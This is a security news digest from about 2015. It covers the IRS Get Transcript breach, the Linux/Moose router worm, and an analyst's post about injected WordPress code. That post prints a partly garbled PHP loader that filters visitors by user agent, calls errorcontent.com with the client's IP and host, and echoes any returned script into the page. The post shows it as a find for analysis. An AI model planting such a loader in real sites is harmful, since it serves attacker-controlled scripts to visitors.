Information Security News |
In an official statement issued today, the IRS announced that it has shut down an online service to obtain tax records after determining that "unusual activity had taken place on the application, which indicates that unauthorized third parties had access to some accounts on the transcript application." An initial review of that activity revealed "access was gained to more than 100,000 accounts through the Get Transcript application," according to the IRS statement.
After the IRS disclosed more information, it became clear the user data was not obtained because of a direct hack of government systems. Rather, weak authentication used by the IRS to protect access to taxpayer data is likely at fault. The attackers were able to acquire taxpayer records using stolen personal identifying information, possibly pulled from online financial fraud marketplaces.
The Get Transcript application, a feature of the IRS' site that allows taxpayers to download tax return and tax payment transaction data, was apparently targeted by financial fraudsters between February and mid-May. The service was shut down last week as the IRS investigated the activity, which may have been linked to the fraudulent filing of tax returns and transfer of tax refunds. Attempts were made to access over 200,000 accounts; roughly half failed because of incorrect information inputted during the IRS' authentication process.
Read 7 remaining paragraphs | Comments
A worm that targets cable and DSL modems, home routers, and other embedded computers is turning those devices into a proxy network for launching armies of fraudulent Instagram, Twitter, and Vine accounts as well as fake accounts on other social networks. The new worm can also hijack routers' DNS service to route requests to a malicious server, steal unencrypted social media cookies such as those used by Instagram, and then use those cookies to add "follows" to fraudulent accounts. This allows the worm to spread itself to embedded systems on the local network that use Linux-based operating systems.
The malware, dubbed "Linux/Moose" by Olivier Bilodeau and Thomas Dupuy of the security firm ESET Canada Research, exploits routers open to connections from the Internet via Telnet by performing brute-force login attempts using default or common administrative credentials. Once connected, the worm installs itself on the targeted device.
Moose spreads itself using a file named elan2—"élan" is the French word for moose, Bilodeau and Dupuy explained in their report. Once installed, the malware begins to watch traffic passing through the router for unencrypted cookies from Web browsers and mobile applications, which may be passed to unencrypted sites that leverage social network features:
Read 6 remaining paragraphs | Comments
Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability):
#2b8008# ">">/* turn off error reporting */
@ini_set(display_errors ">/* do not display errors to the user */
$wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT">/* only run the code if this is Chrome or IE and not a bot */
if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610)))
{ "># Assemble a URL like http://errorcontent.com/content?ip=[client ip]referer=[server host name]ua=[user agent]
mezd098610=http://.error.content..com/.content./? ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua="># check if we have the curl extension installed
if (function_exists(curl_init) function_exists(curl_exec"># if we dont have curl, try file_get_contents which requires allow_url_fopen.
elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen"># or try fopen as a last resort
elseif (function_exists(fopen) function_exists(stream_get_contents)) {[email protected]_get_contents(@fopen($wp_mezd098610, r}}
ubstr($wp_8610mezd,1,3) === scr"># The data retrieved will be echoed back to the user if it starts with the string scr.
I havent been able to retrieve any content from errorcontent.com. Has anybody else seen this code, or is able to retrieve content from errorcontent.com ?
According to whois, errorcontent.com is owned by a Chinese organization. It currently resolves to37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet willbe appreciated.
---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn
Posted by InfoSec News on May 26
http://www.theage.com.au/it-pro/security-it/this-is-just-the-tip-of-the-iceberg-aeroplane-hacking-case-points-to-deeper-cyber-issues-20150526-gh9n4y.htmlPosted by InfoSec News on May 26
http://www.defenseone.com/technology/2015/05/pentagon-rethinking-475-million-cyber-defense-proposal/113635/Posted by InfoSec News on May 26
http://www.computerworld.com/article/2925849/malware-cybercrime/full-adult-friend-finder-database-offered-up-for-17k-worth-of-bitcoins.html